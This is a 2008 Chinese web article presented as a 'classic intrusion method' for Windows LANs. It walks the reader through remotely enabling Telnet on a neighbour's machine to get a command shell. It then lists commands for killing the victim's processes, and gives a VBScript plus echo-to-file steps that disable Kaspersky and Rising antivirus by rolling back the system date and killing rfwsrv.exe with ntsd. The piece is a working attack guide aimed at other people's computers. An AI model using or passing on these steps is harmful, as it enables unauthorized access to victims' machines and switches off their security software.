pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范windows局域网的一个经典的入侵方法
阅读排行

windows局域网的一个经典的入侵方法


2008/11/26  编辑:佚名 来源:本站整理

3年前我用的东西了, 可能大家比较老了, 不过也许现在还是能用上的, 不过大家不妨试验一下很有趣的。

  点我的电脑右键单机管理, 然后点操作底下的=》连接到另外一个计算机。 输入对方ip

  或者你不知道对方ip 可以这样, 点浏览高级里的立即查找, 就可以显示本局域网工作组内的计算机了。 然后双击你要进入的电脑, 呵呵一般局域网的计算机密码是一样的, 所以不需要NTLM验证, 不过那个验证比较老了, 现在不知道还有没有人会用, 进入后然后点服务和应用, 找到telnet服务, 然后开启对方telnet服务, 如果没有进入这些界面或者服务出错是因为对方没有开rpc服务, 当然还是选择放弃吧, 如果按照刚才步骤成功, 那恭喜你已经得到一个进入对方计算机的通道了。

  然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了, 当然这里有个小技巧, 如果你不知道对方ip怎么办。 很简单cmd下输入net view 可以查看到局域网计算机名, 然后点鼠标右键 标记你要的计算机名字选中 按下回车就复制到cmd的剪切板里了, 然后用ping命令 ping 粘贴你刚才复制的内容(直接点右键就出来了) 然后就能看到你ping的ip了。

  进入对方计算机该后该怎么做呢。 呵呵 很多黑客教程好像没有具体告诉我们下一步我们该怎么办吧 嘿嘿。

  发挥你的想象, 把对方电脑就当成你本机一样去对待, 比如你想查看对方进程。

  cmd 下输入 tasklist

  进程太多看不完怎么办 tasklist | more

  想杀掉他的进程怎么办?

  taskkill /f /im 进程名字 /t 如关qq taskkill /f /im qq.exe /t

  或者有的用ntsd杀进程

  ntsd -c q -p PID

  PID是用他是用tasklist就可以看到的对照相应的PID就能杀进程

  如果多次查杀对方进程不成功是什么原因, 很可能对方有杀毒软件或者防火墙

  怎么去杀掉卡巴这些进程呢?

  这里有一个脚本

  Set ws = CreateObject("Wscript.Shell")

  ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide

  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_

  if ps.Name="rfwsrv.exe" then

  ws.run "ntsd -c q -p ps.handle",0

  我们可以这样去做 echo 加上面的每一行脚本代码>>c:\kill.vbs

  最后在运行这个脚本 就可以了。 呵呵

  也可以你觉得麻烦直接输入 date 然后加日期修改成1988年左右就行了 卡巴就失效了

  瑞星的原理也是taskkill掉了rfwsrv.exe这个进程使杀毒软件失效。

  其他的就不用我说了自己研究点dos命令就可以搞定了。

相关文章

如何搜索连接隐藏的WiFi信号?:如何搜索连接隐藏的WiFi信号?Android设备打开android设备的WiFi连接列表,然后把列表拉到最底下:选择“高级设置”SSID的地方输入WiFi名称,加密方式要选择WPA/WPA2的方式,密码输入WiFi...。

微软已修复Windows登录凭证漏洞:今年5月,哥伦比亚安全研究员JuanDiego向微软报告了一个漏洞,该漏洞可使得攻击者在无需任何用户交互的情况下随意窃取WindowsNTLM密码哈希,允许与受害者网络直接连接的攻击者升级对附近系统的访问。

win10系统禁止自动开启开始菜单全屏幕的方法:在win10系统中,可以通过自定义设置将开始菜单全屏幕化。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图